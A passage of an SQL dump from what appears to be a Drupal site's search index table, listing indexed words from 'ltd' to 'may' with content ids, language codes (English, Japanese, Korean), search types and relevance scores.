('ltd', 30, 'ja', 'node_search', 0.830633),
('ltd', 30, 'ko', 'node_search', 1),
('ltd', 62, 'en', 'node_search', 1),
('luck', 69, 'en', 'node_search', 1),
('luxury', 31, 'en', 'node_search', 0.842342),
('lwin', 108, 'en', 'node_search', 2),
('lwin', 108, 'ja', 'node_search', 2),
('lwin', 113, 'en', 'node_search', 2),
('lwin', 113, 'ja', 'node_search', 2),
('lwin', 134, 'en', 'node_search', 1),
('lwin', 134, 'ja', 'node_search', 1),
('lwin', 157, 'en', 'node_search', 1),
('lwin', 157, 'ja', 'node_search', 1),
('lwin', 176, 'en', 'node_search', 1),
('lwin', 176, 'ja', 'node_search', 1),
('lwin', 186, 'en', 'node_search', 3),
('lwin', 186, 'ja', 'node_search', 1.76922),
('machine', 5, 'en', 'help_search', 1),
('machine', 5, 'ja', 'help_search', 1),
('machine', 5, 'ko', 'help_search', 1),
('machine', 57, 'en', 'help_search', 1),
('machine', 57, 'ja', 'help_search', 1),
('machine', 57, 'ko', 'help_search', 1),
('machine', 83, 'en', 'help_search', 4),
('machine', 83, 'ja', 'help_search', 4),
('machine', 83, 'ko', 'help_search', 4),
('machinereadable', 44, 'en', 'help_search', 1),
('machinereadable', 44, 'ja', 'help_search', 1),
('machinereadable', 44, 'ko', 'help_search', 1),
('machinery', 23, 'en', 'node_search', 1),
('machinery', 27, 'en', 'node_search', 1),
('made', 27, 'en', 'node_search', 0.650439),
('made', 50, 'en', 'help_search', 1),
('made', 50, 'ja', 'help_search', 1),
('made', 50, 'ko', 'help_search', 1),
('made', 91, 'en', 'help_search', 0.997306),
('made', 91, 'ja', 'help_search', 0.993146),
('made', 91, 'ko', 'help_search', 0.997306),
('made', 120, 'en', 'node_search', 1),
('mai', 167, 'en', 'node_search', 1),
('mai', 167, 'ja', 'node_search', 1),
('mai', 198, 'en', 'node_search', 2),
('mai', 198, 'ja', 'node_search', 1.78178),
('mail', 86, 'en', 'help_search', 1),
('mail', 86, 'ja', 'help_search', 1),
('mail', 86, 'ko', 'help_search', 1),
('main', 29, 'en', 'help_search', 1),
('main', 29, 'ja', 'help_search', 1),
('main', 29, 'ko', 'help_search', 1),
('main', 31, 'ja', 'help_search', 2.32097),
('main', 45, 'en', 'help_search', 1),
('main', 45, 'ja', 'help_search', 1),
('main', 45, 'ko', 'help_search', 1),
('main', 46, 'en', 'help_search', 0.980874),
('main', 46, 'ja', 'help_search', 0.980874),
('main', 46, 'ko', 'help_search', 0.980874),
('main', 68, 'en', 'help_search', 2),
('main', 68, 'ja', 'help_search', 2),
('main', 68, 'ko', 'help_search', 2),
('main', 71, 'en', 'help_search', 2),
('main', 71, 'ja', 'help_search', 2),
('main', 71, 'ko', 'help_search', 2),
('maintain', 87, 'en', 'node_search', 1),
('maintaining', 34, 'en', 'help_search', 46),
('maintaining', 34, 'ja', 'help_search', 46),
('maintaining', 34, 'ko', 'help_search', 46),
('maintenance', 32, 'en', 'help_search', 10.4874),
('maintenance', 32, 'ja', 'help_search', 10.4874),
('maintenance', 32, 'ko', 'help_search', 10.4874),
('maintenance', 34, 'en', 'help_search', 13),
('maintenance', 34, 'ja', 'help_search', 13),
('maintenance', 34, 'ko', 'help_search', 13),
('maintenance', 38, 'en', 'help_search', 11),
('maintenance', 38, 'ja', 'help_search', 11),
('maintenance', 38, 'ko', 'help_search', 11),
('maintenance', 73, 'en', 'help_search', 75),
('maintenance', 73, 'ja', 'help_search', 75),
('maintenance', 73, 'ko', 'help_search', 75),
('maintenance', 75, 'en', 'help_search', 5),
('maintenance', 75, 'ja', 'help_search', 5),
('maintenance', 75, 'ko', 'help_search', 5),
('maintenance', 76, 'en', 'help_search', 11),
('maintenance', 76, 'ja', 'help_search', 11),
('maintenance', 76, 'ko', 'help_search', 11),
('make', 21, 'en', 'help_search', 4),
('make', 21, 'ja', 'help_search', 4),
('make', 21, 'ko', 'help_search', 4),
('make', 22, 'en', 'help_search', 4),
('make', 22, 'ja', 'help_search', 4),
('make', 22, 'ko', 'help_search', 4),
('make', 23, 'en', 'help_search', 1),
('make', 23, 'ja', 'help_search', 1),
('make', 23, 'ko', 'help_search', 1),
('make', 24, 'en', 'help_search', 1),
('make', 24, 'en', 'node_search', 0.740689),
('make', 24, 'ja', 'help_search', 1),
('make', 24, 'ko', 'help_search', 1),
('make', 27, 'en', 'help_search', 1),
('make', 27, 'ja', 'help_search', 1),
('make', 27, 'ko', 'help_search', 1),
('make', 32, 'en', 'help_search', 1),
('make', 32, 'ja', 'help_search', 1),
('make', 32, 'ko', 'help_search', 1),
('make', 39, 'en', 'help_search', 1),
('make', 39, 'ja', 'help_search', 1),
('make', 39, 'ko', 'help_search', 1),
('make', 42, 'en', 'help_search', 2),
('make', 42, 'ja', 'help_search', 2),
('make', 42, 'ko', 'help_search', 2),
('make', 45, 'en', 'help_search', 1),
('make', 45, 'ja', 'help_search', 1),
('make', 45, 'ko', 'help_search', 1),
('make', 52, 'en', 'help_search', 1),
('make', 52, 'ja', 'help_search', 1),
('make', 52, 'ko', 'help_search', 1),
('make', 56, 'en', 'help_search', 1),
('make', 56, 'ja', 'help_search', 1),
('make', 56, 'ko', 'help_search', 1),
('make', 59, 'en', 'help_search', 1),
('make', 59, 'ja', 'help_search', 1),
('make', 59, 'ko', 'help_search', 1),
('make', 61, 'en', 'help_search', 0.989021),
('make', 61, 'ja', 'help_search', 0.989021),
('make', 61, 'ko', 'help_search', 0.989021),
('make', 63, 'en', 'help_search', 1),
('make', 63, 'ja', 'help_search', 1),
('make', 63, 'ko', 'help_search', 1),
('make', 64, 'en', 'help_search', 1),
('make', 64, 'ja', 'help_search', 1),
('make', 64, 'ko', 'help_search', 1),
('make', 66, 'en', 'help_search', 1),
('make', 66, 'ja', 'help_search', 1),
('make', 67, 'en', 'help_search', 3.91323),
('make', 67, 'ja', 'help_search', 3.91323),
('make', 67, 'ko', 'help_search', 3.91323),
('make', 68, 'en', 'help_search', 0.836446),
('make', 68, 'ja', 'help_search', 0.836446),
('make', 68, 'ko', 'help_search', 0.836446),
('make', 69, 'en', 'help_search', 2),
('make', 69, 'ja', 'help_search', 2),
('make', 69, 'ko', 'help_search', 2),
('make', 74, 'en', 'help_search', 1),
('make', 74, 'ja', 'help_search', 1),
('make', 74, 'ko', 'help_search', 1),
('make', 75, 'en', 'help_search', 1),
('make', 75, 'ja', 'help_search', 1),
('make', 75, 'ko', 'help_search', 1),
('make', 81, 'en', 'help_search', 2),
('make', 81, 'ja', 'help_search', 2),
('make', 81, 'ko', 'help_search', 2),
('make', 86, 'en', 'help_search', 2),
('make', 86, 'ja', 'help_search', 2),
('make', 86, 'ko', 'help_search', 2),
('make', 87, 'en', 'node_search', 1),
('make', 89, 'en', 'help_search', 1),
('make', 89, 'ja', 'help_search', 1),
('make', 89, 'ko', 'help_search', 1),
('make', 116, 'en', 'node_search', 1),
('make', 156, 'en', 'node_search', 1),
('make', 157, 'en', 'node_search', 1),
('make', 162, 'en', 'node_search', 1),
('make', 178, 'en', 'node_search', 1),
('make', 188, 'en', 'node_search', 1),
('make', 204, 'en', 'node_search', 4),
('make', 204, 'ja', 'node_search', 4),
('makes', 68, 'en', 'help_search', 0.968904),
('makes', 68, 'ja', 'help_search', 0.968904),
('makes', 68, 'ko', 'help_search', 0.968904),
('making', 23, 'en', 'node_search', 0.842342),
('making', 25, 'ja', 'help_search', 1),
('making', 26, 'en', 'help_search', 1),
('making', 26, 'ja', 'help_search', 1),
('making', 26, 'ko', 'help_search', 1),
('making', 30, 'en', 'help_search', 7.33326),
('making', 30, 'ja', 'help_search', 7.33326),
('making', 30, 'ko', 'help_search', 7.33326),
('making', 38, 'en', 'help_search', 26),
('making', 38, 'ja', 'help_search', 26),
('making', 38, 'ko', 'help_search', 26),
('malaysia', 23, 'en', 'node_search', 0.889397),
('malaysia', 24, 'en', 'node_search', 0.889397),
('male', 4, 'en', 'node_search', 1),
('male', 4, 'ja', 'node_search', 1),
('malicious', 28, 'en', 'help_search', 0.896076),
('malicious', 28, 'ja', 'help_search', 0.896076),
('malicious', 28, 'ko', 'help_search', 0.896076),
('manage', 1, 'en', 'help_search', 4),
('manage', 1, 'ja', 'help_search', 4),
('manage', 1, 'ko', 'help_search', 4),
('manage', 2, 'en', 'help_search', 1),
('manage', 2, 'ja', 'help_search', 1),
('manage', 2, 'ko', 'help_search', 1),
('manage', 3, 'en', 'help_search', 4),
('manage', 3, 'ja', 'help_search', 4),
('manage', 3, 'ko', 'help_search', 4),
('manage', 4, 'en', 'help_search', 4),
('manage', 4, 'ja', 'help_search', 4),
('manage', 4, 'ko', 'help_search', 4),
('manage', 5, 'en', 'help_search', 16),
('manage', 5, 'ja', 'help_search', 16),
('manage', 5, 'ko', 'help_search', 16),
('manage', 8, 'en', 'help_search', 4),
('manage', 8, 'ja', 'help_search', 4),
('manage', 8, 'ko', 'help_search', 4),
('manage', 9, 'en', 'help_search', 4),
('manage', 9, 'ja', 'help_search', 4),
('manage', 9, 'ko', 'help_search', 4),
('manage', 10, 'en', 'help_search', 4),
('manage', 10, 'ja', 'help_search', 4),
('manage', 10, 'ko', 'help_search', 4),
('manage', 12, 'en', 'help_search', 4),
('manage', 12, 'ja', 'help_search', 4),
('manage', 12, 'ko', 'help_search', 4),
('manage', 13, 'en', 'help_search', 4),
('manage', 13, 'ja', 'help_search', 4),
('manage', 13, 'ko', 'help_search', 4),
('manage', 14, 'en', 'help_search', 4),
('manage', 14, 'ja', 'help_search', 4),
('manage', 14, 'ko', 'help_search', 4),
('manage', 15, 'en', 'help_search', 4),
('manage', 15, 'ja', 'help_search', 4),
('manage', 15, 'ko', 'help_search', 4),
('manage', 16, 'en', 'help_search', 4),
('manage', 16, 'ja', 'help_search', 4),
('manage', 16, 'ko', 'help_search', 4),
('manage', 17, 'en', 'help_search', 12),
('manage', 17, 'ja', 'help_search', 12),
('manage', 17, 'ko', 'help_search', 12),
('manage', 18, 'en', 'help_search', 8),
('manage', 18, 'ja', 'help_search', 8),
('manage', 18, 'ko', 'help_search', 8),
('manage', 19, 'en', 'help_search', 4),
('manage', 19, 'ja', 'help_search', 4),
('manage', 19, 'ko', 'help_search', 4),
('manage', 21, 'en', 'help_search', 4),
('manage', 21, 'ja', 'help_search', 4),
('manage', 21, 'ko', 'help_search', 4),
('manage', 23, 'en', 'help_search', 4),
('manage', 23, 'ja', 'help_search', 4),
('manage', 23, 'ko', 'help_search', 4),
('manage', 24, 'en', 'help_search', 12),
('manage', 24, 'ja', 'help_search', 12),
('manage', 24, 'ko', 'help_search', 12),
('manage', 25, 'en', 'help_search', 8),
('manage', 25, 'ja', 'help_search', 8),
('manage', 26, 'en', 'help_search', 8),
('manage', 26, 'ja', 'help_search', 8),
('manage', 26, 'ko', 'help_search', 8),
('manage', 27, 'en', 'help_search', 12),
('manage', 27, 'ja', 'help_search', 12),
('manage', 27, 'ko', 'help_search', 12),
('manage', 28, 'en', 'help_search', 3.95608),
('manage', 28, 'ja', 'help_search', 3.95608),
('manage', 28, 'ko', 'help_search', 3.95608),
('manage', 32, 'en', 'help_search', 4),
('manage', 32, 'ja', 'help_search', 4),
('manage', 32, 'ko', 'help_search', 4),
('manage', 37, 'en', 'help_search', 3.55759),
('manage', 37, 'ja', 'help_search', 3.55759),
('manage', 37, 'ko', 'help_search', 3.55759),
('manage', 43, 'en', 'help_search', 2.91674),
('manage', 43, 'ja', 'help_search', 2.91674),
('manage', 43, 'ko', 'help_search', 2.91674),
('manage', 45, 'en', 'help_search', 16),
('manage', 45, 'ja', 'help_search', 16),
('manage', 45, 'ko', 'help_search', 16),
('manage', 48, 'en', 'help_search', 4),
('manage', 48, 'ja', 'help_search', 4),
('manage', 48, 'ko', 'help_search', 4),
('manage', 49, 'en', 'help_search', 4),
('manage', 49, 'ja', 'help_search', 4),
('manage', 49, 'ko', 'help_search', 4),
('manage', 50, 'en', 'help_search', 4),
('manage', 50, 'ja', 'help_search', 4),
('manage', 50, 'ko', 'help_search', 4),
('manage', 51, 'en', 'help_search', 4),
('manage', 51, 'ja', 'help_search', 4),
('manage', 51, 'ko', 'help_search', 4),
('manage', 52, 'en', 'help_search', 4),
('manage', 52, 'ja', 'help_search', 4),
('manage', 52, 'ko', 'help_search', 4),
('manage', 53, 'en', 'help_search', 8),
('manage', 53, 'ja', 'help_search', 8),
('manage', 53, 'ko', 'help_search', 8),
('manage', 54, 'en', 'help_search', 8),
('manage', 54, 'ja', 'help_search', 8),
('manage', 54, 'ko', 'help_search', 8),
('manage', 55, 'en', 'help_search', 4),
('manage', 55, 'ja', 'help_search', 4),
('manage', 55, 'ko', 'help_search', 4),
('manage', 56, 'en', 'help_search', 8),
('manage', 56, 'ja', 'help_search', 8),
('manage', 56, 'ko', 'help_search', 8),
('manage', 57, 'en', 'help_search', 4),
('manage', 57, 'ja', 'help_search', 4),
('manage', 57, 'ko', 'help_search', 4),
('manage', 58, 'en', 'help_search', 4),
('manage', 58, 'ja', 'help_search', 4),
('manage', 58, 'ko', 'help_search', 4),
('manage', 59, 'en', 'help_search', 4),
('manage', 59, 'ja', 'help_search', 4),
('manage', 59, 'ko', 'help_search', 4),
('manage', 60, 'en', 'help_search', 12),
('manage', 60, 'ja', 'help_search', 12),
('manage', 60, 'ko', 'help_search', 12),
('manage', 61, 'en', 'help_search', 4),
('manage', 61, 'ja', 'help_search', 4),
('manage', 61, 'ko', 'help_search', 4),
('manage', 62, 'en', 'help_search', 1),
('manage', 62, 'ja', 'help_search', 1),
('manage', 62, 'ko', 'help_search', 1),
('manage', 64, 'en', 'help_search', 23),
('manage', 64, 'ja', 'help_search', 23),
('manage', 64, 'ko', 'help_search', 23),
('manage', 66, 'en', 'help_search', 4),
('manage', 66, 'ja', 'help_search', 4),
('manage', 67, 'en', 'help_search', 5),
('manage', 67, 'ja', 'help_search', 5),
('manage', 67, 'ko', 'help_search', 5),
('manage', 70, 'en', 'help_search', 4),
('manage', 70, 'ja', 'help_search', 4),
('manage', 70, 'ko', 'help_search', 4),
('manage', 71, 'en', 'help_search', 12),
('manage', 71, 'ja', 'help_search', 12),
('manage', 71, 'ko', 'help_search', 12),
('manage', 72, 'en', 'help_search', 7.75353),
('manage', 72, 'ja', 'help_search', 7.75353),
('manage', 72, 'ko', 'help_search', 7.75353),
('manage', 73, 'en', 'help_search', 8),
('manage', 73, 'ja', 'help_search', 8),
('manage', 73, 'ko', 'help_search', 8),
('manage', 74, 'en', 'help_search', 4),
('manage', 74, 'ja', 'help_search', 4),
('manage', 74, 'ko', 'help_search', 4),
('manage', 75, 'en', 'help_search', 4),
('manage', 75, 'ja', 'help_search', 4),
('manage', 75, 'ko', 'help_search', 4),
('manage', 76, 'en', 'help_search', 12),
('manage', 76, 'ja', 'help_search', 12),
('manage', 76, 'ko', 'help_search', 12),
('manage', 77, 'en', 'help_search', 4),
('manage', 77, 'ja', 'help_search', 4),
('manage', 77, 'ko', 'help_search', 4),
('manage', 78, 'en', 'help_search', 4),
('manage', 78, 'ja', 'help_search', 4),
('manage', 78, 'ko', 'help_search', 4),
('manage', 79, 'en', 'help_search', 4),
('manage', 79, 'ja', 'help_search', 4),
('manage', 79, 'ko', 'help_search', 4),
('manage', 82, 'en', 'help_search', 4),
('manage', 82, 'ja', 'help_search', 4),
('manage', 82, 'ko', 'help_search', 4),
('manage', 83, 'en', 'help_search', 4),
('manage', 83, 'ja', 'help_search', 4),
('manage', 83, 'ko', 'help_search', 4),
('manage', 84, 'en', 'help_search', 1),
('manage', 84, 'ja', 'help_search', 1),
('manage', 84, 'ko', 'help_search', 1),
('manage', 85, 'en', 'help_search', 4),
('manage', 85, 'ja', 'help_search', 4),
('manage', 85, 'ko', 'help_search', 4),
('manage', 86, 'en', 'help_search', 4),
('manage', 86, 'ja', 'help_search', 4),
('manage', 86, 'ko', 'help_search', 4),
('manage', 87, 'en', 'help_search', 4),
('manage', 87, 'ja', 'help_search', 4),
('manage', 87, 'ko', 'help_search', 4),
('manage', 88, 'en', 'help_search', 4),
('manage', 88, 'ja', 'help_search', 4),
('manage', 88, 'ko', 'help_search', 4),
('manage', 89, 'en', 'help_search', 4),
('manage', 89, 'ja', 'help_search', 4),
('manage', 89, 'ko', 'help_search', 4),
('manage', 90, 'en', 'help_search', 4),
('manage', 90, 'ja', 'help_search', 4),
('manage', 90, 'ko', 'help_search', 4),
('manage', 91, 'en', 'help_search', 4),
('manage', 91, 'ja', 'help_search', 4),
('manage', 91, 'ko', 'help_search', 4),
('manage', 92, 'en', 'help_search', 4),
('manage', 92, 'ja', 'help_search', 4),
('manage', 92, 'ko', 'help_search', 4),
('managed', 28, 'en', 'help_search', 1),
('managed', 28, 'ja', 'help_search', 1),
('managed', 28, 'ko', 'help_search', 1),
('managed', 35, 'en', 'help_search', 1),
('managed', 35, 'ja', 'help_search', 1),
('managed', 35, 'ko', 'help_search', 1),
('managed', 38, 'en', 'help_search', 1),
('managed', 38, 'ja', 'help_search', 1),
('managed', 38, 'ko', 'help_search', 1),
('managed', 69, 'en', 'help_search', 1),
('managed', 69, 'ja', 'help_search', 1),
('managed', 69, 'ko', 'help_search', 1),
('managed', 80, 'en', 'help_search', 1),
('managed', 80, 'ja', 'help_search', 1),
('managed', 80, 'ko', 'help_search', 1),
('management', 10, 'en', 'help_search', 1),
('management', 10, 'ja', 'help_search', 1),
('management', 10, 'ko', 'help_search', 1),
('management', 20, 'en', 'help_search', 19),
('management', 20, 'ja', 'help_search', 19),
('management', 20, 'ko', 'help_search', 19),
('management', 27, 'en', 'node_search', 0.980874),
('management', 30, 'en', 'help_search', 8.20031),
('management', 30, 'ja', 'help_search', 8.20031),
('management', 30, 'ko', 'help_search', 8.20031),
('management', 59, 'en', 'help_search', 11),
('management', 59, 'ja', 'help_search', 11),
('management', 59, 'ko', 'help_search', 11),
('management', 61, 'en', 'help_search', 10.4874),
('management', 61, 'ja', 'help_search', 10.4874),
('management', 61, 'ko', 'help_search', 10.4874),
('manager', 27, 'en', 'node_search', 0.76431),
('manager', 30, 'en', 'help_search', 0.731649),
('manager', 30, 'ja', 'help_search', 0.731649),
('manager', 30, 'ko', 'help_search', 0.731649),
('manager', 41, 'en', 'help_search', 1),
('manager', 41, 'ja', 'help_search', 1),
('manager', 41, 'ko', 'help_search', 1),
('manager', 49, 'en', 'help_search', 1),
('manager', 49, 'ja', 'help_search', 1),
('manager', 49, 'ko', 'help_search', 1),
('manager', 76, 'en', 'help_search', 1),
('manager', 76, 'ja', 'help_search', 1),
('manager', 76, 'ko', 'help_search', 1),
('managers', 7, 'en', 'node_search', 2),
('managers', 7, 'ko', 'node_search', 4),
('managers', 20, 'en', 'help_search', 1),
('managers', 20, 'ja', 'help_search', 1),
('managers', 20, 'ko', 'help_search', 1),
('manages', 41, 'en', 'help_search', 1),
('manages', 41, 'ja', 'help_search', 1),
('manages', 41, 'ko', 'help_search', 1),
('managing', 2, 'en', 'help_search', 45),
('managing', 2, 'ja', 'help_search', 45),
('managing', 2, 'ko', 'help_search', 45),
('managing', 6, 'en', 'help_search', 44.6366),
('managing', 6, 'ja', 'help_search', 44.6366),
('managing', 6, 'ko', 'help_search', 44.6366),
('managing', 7, 'en', 'help_search', 1),
('managing', 7, 'ja', 'help_search', 1),
('managing', 7, 'ko', 'help_search', 1),
('managing', 8, 'en', 'help_search', 2),
('managing', 8, 'ja', 'help_search', 2),
('managing', 8, 'ko', 'help_search', 2),
('managing', 9, 'en', 'help_search', 1),
('managing', 9, 'ja', 'help_search', 1),
('managing', 9, 'ko', 'help_search', 1),
('managing', 11, 'en', 'help_search', 45.1362),
('managing', 11, 'ja', 'help_search', 45.1362),
('managing', 11, 'ko', 'help_search', 45.1362),
('managing', 12, 'en', 'help_search', 1),
('managing', 12, 'ja', 'help_search', 1),
('managing', 12, 'ko', 'help_search', 1),
('managing', 13, 'en', 'help_search', 1),
('managing', 13, 'ja', 'help_search', 1),
('managing', 13, 'ko', 'help_search', 1),
('managing', 14, 'en', 'help_search', 1),
('managing', 14, 'ja', 'help_search', 1),
('managing', 14, 'ko', 'help_search', 1),
('managing', 15, 'en', 'help_search', 1),
('managing', 15, 'ja', 'help_search', 1),
('managing', 15, 'ko', 'help_search', 1),
('managing', 16, 'en', 'help_search', 1),
('managing', 16, 'ja', 'help_search', 1),
('managing', 16, 'ko', 'help_search', 1),
('managing', 17, 'en', 'help_search', 26),
('managing', 17, 'ja', 'help_search', 26),
('managing', 17, 'ko', 'help_search', 26),
('managing', 18, 'en', 'help_search', 1),
('managing', 18, 'ja', 'help_search', 1),
('managing', 18, 'ko', 'help_search', 1),
('managing', 19, 'en', 'help_search', 1),
('managing', 19, 'ja', 'help_search', 1),
('managing', 19, 'ko', 'help_search', 1),
('managing', 20, 'en', 'help_search', 26),
('managing', 20, 'ja', 'help_search', 26),
('managing', 20, 'ko', 'help_search', 26),
('managing', 23, 'en', 'help_search', 2.83669),
('managing', 23, 'ja', 'help_search', 2.83669),
('managing', 23, 'ko', 'help_search', 2.83669),
('managing', 24, 'en', 'help_search', 3),
('managing', 24, 'ja', 'help_search', 3),
('managing', 24, 'ko', 'help_search', 3),
('managing', 25, 'en', 'help_search', 2),
('managing', 25, 'ja', 'help_search', 2),
('managing', 26, 'en', 'help_search', 2),
('managing', 26, 'ja', 'help_search', 2),
('managing', 26, 'ko', 'help_search', 2),
('managing', 27, 'en', 'help_search', 2),
('managing', 27, 'ja', 'help_search', 2),
('managing', 27, 'ko', 'help_search', 2),
('managing', 28, 'en', 'help_search', 26),
('managing', 28, 'ja', 'help_search', 26),
('managing', 28, 'ko', 'help_search', 26),
('managing', 29, 'en', 'help_search', 1),
('managing', 29, 'ja', 'help_search', 1),
('managing', 29, 'ko', 'help_search', 1),
('managing', 30, 'en', 'help_search', 40.1606),
('managing', 30, 'ja', 'help_search', 40.1606),
('managing', 30, 'ko', 'help_search', 40.1606),
('managing', 31, 'ja', 'help_search', 38.6049),
('managing', 35, 'en', 'help_search', 47),
('managing', 35, 'ja', 'help_search', 47),
('managing', 35, 'ko', 'help_search', 47),
('managing', 36, 'en', 'help_search', 46),
('managing', 36, 'ja', 'help_search', 46),
('managing', 36, 'ko', 'help_search', 46),
('managing', 41, 'en', 'help_search', 2),
('managing', 41, 'ja', 'help_search', 2),
('managing', 41, 'ko', 'help_search', 2),
('managing', 44, 'en', 'help_search', 1),
('managing', 44, 'ja', 'help_search', 1),
('managing', 44, 'ko', 'help_search', 1),
('managing', 48, 'en', 'help_search', 1),
('managing', 48, 'ja', 'help_search', 1),
('managing', 48, 'ko', 'help_search', 1),
('managing', 54, 'en', 'help_search', 2),
('managing', 54, 'ja', 'help_search', 2),
('managing', 54, 'ko', 'help_search', 2);
INSERT INTO `search_index` (`word`, `sid`, `langcode`, `type`, `score`) VALUES
('managing', 59, 'en', 'help_search', 1),
('managing', 59, 'ja', 'help_search', 1),
('managing', 59, 'ko', 'help_search', 1),
('managing', 60, 'en', 'help_search', 1),
('managing', 60, 'ja', 'help_search', 1),
('managing', 60, 'ko', 'help_search', 1),
('managing', 61, 'en', 'help_search', 1),
('managing', 61, 'ja', 'help_search', 1),
('managing', 61, 'ko', 'help_search', 1),
('managing', 62, 'en', 'help_search', 46),
('managing', 62, 'ja', 'help_search', 46),
('managing', 62, 'ko', 'help_search', 46),
('managing', 66, 'en', 'help_search', 1),
('managing', 66, 'ja', 'help_search', 1),
('managing', 67, 'en', 'help_search', 26),
('managing', 67, 'ja', 'help_search', 26),
('managing', 67, 'ko', 'help_search', 26),
('managing', 68, 'en', 'help_search', 0.848323),
('managing', 68, 'ja', 'help_search', 0.848323),
('managing', 68, 'ko', 'help_search', 0.848323),
('managing', 79, 'en', 'help_search', 2),
('managing', 79, 'ja', 'help_search', 2),
('managing', 79, 'ko', 'help_search', 2),
('managing', 80, 'en', 'help_search', 45.1145),
('managing', 80, 'ja', 'help_search', 45.1145),
('managing', 80, 'ko', 'help_search', 45.1145),
('managing', 84, 'en', 'help_search', 46),
('managing', 84, 'ja', 'help_search', 46),
('managing', 84, 'ko', 'help_search', 46),
('managing', 91, 'en', 'help_search', 1),
('managing', 91, 'ja', 'help_search', 1),
('managing', 91, 'ko', 'help_search', 1),
('managing', 92, 'en', 'help_search', 1),
('managing', 92, 'ja', 'help_search', 1),
('managing', 92, 'ko', 'help_search', 1),
('managing', 93, 'en', 'help_search', 41.2523),
('managing', 93, 'ja', 'help_search', 41.2523),
('managing', 93, 'ko', 'help_search', 41.2523),
('mandalay', 27, 'en', 'node_search', 1.72942),
('manner', 61, 'en', 'help_search', 0.968904),
('manner', 61, 'ja', 'help_search', 0.968904),
('manner', 61, 'ko', 'help_search', 0.968904),
('manner', 133, 'en', 'node_search', 1),
('manners', 87, 'en', 'node_search', 1),
('manually', 32, 'en', 'help_search', 1),
('manually', 32, 'ja', 'help_search', 1),
('manually', 32, 'ko', 'help_search', 1),
('manually', 53, 'en', 'help_search', 4),
('manually', 53, 'ja', 'help_search', 4),
('manually', 53, 'ko', 'help_search', 4),
('manually', 70, 'en', 'help_search', 1),
('manually', 70, 'ja', 'help_search', 1),
('manually', 70, 'ko', 'help_search', 1),
('manually', 76, 'en', 'help_search', 4),
('manually', 76, 'ja', 'help_search', 4),
('manually', 76, 'ko', 'help_search', 4),
('manufacture', 115, 'en', 'node_search', 1),
('many', 24, 'en', 'node_search', 0.876337),
('many', 31, 'ja', 'help_search', 1.53962),
('many', 41, 'en', 'help_search', 1),
('many', 41, 'ja', 'help_search', 1),
('many', 41, 'ko', 'help_search', 1),
('many', 42, 'en', 'help_search', 1),
('many', 42, 'ja', 'help_search', 1),
('many', 42, 'ko', 'help_search', 1),
('many', 62, 'en', 'help_search', 1),
('many', 62, 'ja', 'help_search', 1),
('many', 62, 'ko', 'help_search', 1),
('many', 93, 'en', 'help_search', 0.942091),
('many', 93, 'ja', 'help_search', 0.942091),
('many', 93, 'ko', 'help_search', 0.942091),
('many', 177, 'en', 'node_search', 1),
('many', 204, 'en', 'node_search', 4),
('many', 204, 'ja', 'node_search', 4),
('mapped', 54, 'en', 'help_search', 1),
('mapped', 54, 'ja', 'help_search', 1),
('mapped', 54, 'ko', 'help_search', 1),
('mapping', 54, 'en', 'help_search', 8),
('mapping', 54, 'ja', 'help_search', 8),
('mapping', 54, 'ko', 'help_search', 8),
('march', 175, 'en', 'node_search', 6),
('march', 176, 'en', 'node_search', 6),
('mark', 37, 'en', 'help_search', 1),
('mark', 37, 'ja', 'help_search', 1),
('mark', 37, 'ko', 'help_search', 1),
('marked', 13, 'en', 'help_search', 1),
('marked', 13, 'ja', 'help_search', 1),
('marked', 13, 'ko', 'help_search', 1),
('marked', 47, 'en', 'help_search', 2),
('marked', 47, 'ja', 'help_search', 2),
('marked', 47, 'ko', 'help_search', 2),
('marked', 85, 'en', 'help_search', 1),
('marked', 85, 'ja', 'help_search', 1),
('marked', 85, 'ko', 'help_search', 1),
('marker', 47, 'en', 'help_search', 1),
('marker', 47, 'ja', 'help_search', 1),
('marker', 47, 'ko', 'help_search', 1),
('marks', 164, 'en', 'node_search', 1),
('marks', 165, 'en', 'node_search', 1),
('marks', 167, 'en', 'node_search', 1),
('marks', 171, 'en', 'node_search', 1),
('marks', 174, 'en', 'node_search', 1),
('marks', 176, 'en', 'node_search', 1),
('marks', 177, 'en', 'node_search', 1),
('marks', 187, 'en', 'node_search', 1),
('marks', 193, 'en', 'node_search', 27),
('marks', 194, 'en', 'node_search', 1),
('markup', 11, 'en', 'help_search', 1),
('markup', 11, 'ja', 'help_search', 1),
('markup', 11, 'ko', 'help_search', 1),
('markup', 29, 'en', 'help_search', 1),
('markup', 29, 'ja', 'help_search', 1),
('markup', 29, 'ko', 'help_search', 1),
('markup', 31, 'ja', 'help_search', 1),
('markup', 62, 'en', 'help_search', 1),
('markup', 62, 'ja', 'help_search', 1),
('markup', 62, 'ko', 'help_search', 1),
('master', 24, 'en', 'node_search', 0.76188),
('master', 62, 'en', 'node_search', 5.42171),
('mastery', 62, 'en', 'node_search', 0.819249),
('match', 30, 'en', 'help_search', 0.781775),
('match', 30, 'ja', 'help_search', 0.781775),
('match', 30, 'ko', 'help_search', 0.781775),
('match', 68, 'en', 'help_search', 0.953396),
('match', 68, 'ja', 'help_search', 0.953396),
('match', 68, 'ko', 'help_search', 0.953396),
('match', 71, 'en', 'help_search', 1),
('match', 71, 'ja', 'help_search', 1),
('match', 71, 'ko', 'help_search', 1),
('match', 86, 'en', 'help_search', 1),
('match', 86, 'ja', 'help_search', 1),
('match', 86, 'ko', 'help_search', 1),
('matched', 67, 'en', 'help_search', 1),
('matched', 67, 'ja', 'help_search', 1),
('matched', 67, 'ko', 'help_search', 1),
('matches', 71, 'en', 'help_search', 1),
('matches', 71, 'ja', 'help_search', 1),
('matches', 71, 'ko', 'help_search', 1),
('matching', 68, 'en', 'help_search', 1),
('matching', 68, 'ja', 'help_search', 1),
('matching', 68, 'ko', 'help_search', 1),
('materials', 62, 'en', 'node_search', 1.79984),
('matter', 46, 'en', 'help_search', 1),
('matter', 46, 'ja', 'help_search', 1),
('matter', 46, 'ko', 'help_search', 1),
('matter', 87, 'en', 'node_search', 1),
('maupin', 27, 'en', 'node_search', 0.693594),
('maw', 112, 'en', 'node_search', 28),
('maw', 112, 'ja', 'node_search', 31),
('mawlamyine', 24, 'en', 'node_search', 0.72066),
('mawlamyine', 24, 'ko', 'node_search', 0.691597),
('maximum', 7, 'en', 'help_search', 1),
('maximum', 7, 'ja', 'help_search', 1),
('maximum', 7, 'ko', 'help_search', 1),
('maximum', 37, 'en', 'help_search', 1.86055),
('maximum', 37, 'ja', 'help_search', 1.86055),
('maximum', 37, 'ko', 'help_search', 1.86055),
('may', 8, 'en', 'node_search', 2),
('may', 23, 'en', 'help_search', 1),
